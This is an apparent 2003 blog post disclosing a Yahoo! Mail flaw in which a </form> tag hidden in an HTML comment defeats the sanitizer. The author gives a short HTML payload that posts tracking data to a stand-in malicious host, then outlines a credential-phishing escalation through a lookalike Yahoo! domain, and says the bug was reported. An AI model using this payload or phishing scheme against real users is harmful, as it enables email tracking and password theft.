I just found an exploit for Yahoo! Mail.  First, a little background:

If you receive an email with an HTML attachment, Yahoo! will give you the option to download it, but it will also render it inline, showing you the web page encoded in the attachment.  Yahoo! performs a couple of processing steps on the email to try to secure it: first, the text target=”_blank” onsubmit=”return ShowFormWarning()” is added to the <form> tag.  The target specification means that the requested page will show up in its own window and not take over your Yahoo! Mail session.  The onsubmit specification causes a pop-up dialog to appear, informing the user that he or she is about to send information to someone other than Yahoo!.  Yahoo! will also close the <form> tag if — and this is critical — it doesn’t think it has already been closed.  It apparently checks if the form is closed by searching for the text </form> after each instance of <form …>.

So here is the exploit: send an HTML attachment with </form> enclosed in a comment.  Consider the following as an example:

<form action=”http://www.malicious-site.com/track-email.cgi” method=”post”>

     <input type=”hidden” value=”Message_ID_123456_was_read_by_Joshua_McGee”>

<!– </form> –>

Here’s how it works: the Yahoo! Mail parser will check the message, find </form>, and assume everything is fine.  But now the form is not closed, so all further inputs that might be encountered are treated as belonging to malicious-site.com’s form.  This would not be a problem if Yahoo! coded their pages a little better, but two things make it a problem as it currently stands.  First, the mail page is bracketed by one big <form> tag to control the “Delete” and “Reply” (etc.) features.  Second, the “Delete” button is actually a “Submit” button for this form!

So let’s walk through an example.  I send you the malicious code above as an HTML attachment.  On the page that displays the email, Yahoo! opens one big <form> to control “Delete” and “Reply” functionality.  It renders the malicous code inline, so my code starts an (invisible!) form and inserts an (invisible!) tracking code.  I “end” my <form> tag with a </form> tag embedded in a comment.  Yahoo! checks to see if I have closed my nested <form>, wrongly determines that I have, and doesn’t add a </form> tag for me.  The next <input> encountered is the “Delete” button, which is really a “Submit” button.  But since the malicious <form> was never closed, it is a “Submit” button for the malicious <form>.  So when the user clicks the “Delete” button, expecting to have the message deleted, it instead sends the tracking ID to the malicious site.

“Now wait,” you’re thinking, if you are not totally lost already.  “This will trigger the ShowFormWarning() function.”  True.  But what’s the naïve user to think?  They are clicking a Yahoo! button, so how could it not be safe?  My guess is many users would just ignore the message.

I’m sure you could do more clever things: it might be possible to use Javascript to populate the invisible form with system data, for instance.  Or maybe the target url is a clone of the “Your session has expired, login again” screen.  You could even set the form action url to something like http://login.yahoo10.com/config/mail?.intl=us&.lg=us, assuming you owned yahoo10.com (it’s available.)  When the form data is submitted, then, a Yahoo!-looking window would pop up with a Yahoo!-looking URL asking for the user’s password.  Don’t you figure most people would enter it?  The malicious site now has your email address and password.  Then all the site would have to do, so as not to arouse suspicion, is bring up a Yahoo!-looking page that says “Invalid password”, but on this one have the form correctly set to send the data to Yahoo!.  Voila.

I’ve reported this bug to Yahoo!.

Thu, 24 Jul 2003 12:57:09 -0500
Under computing, websites
Comments feed | Trackback
Log in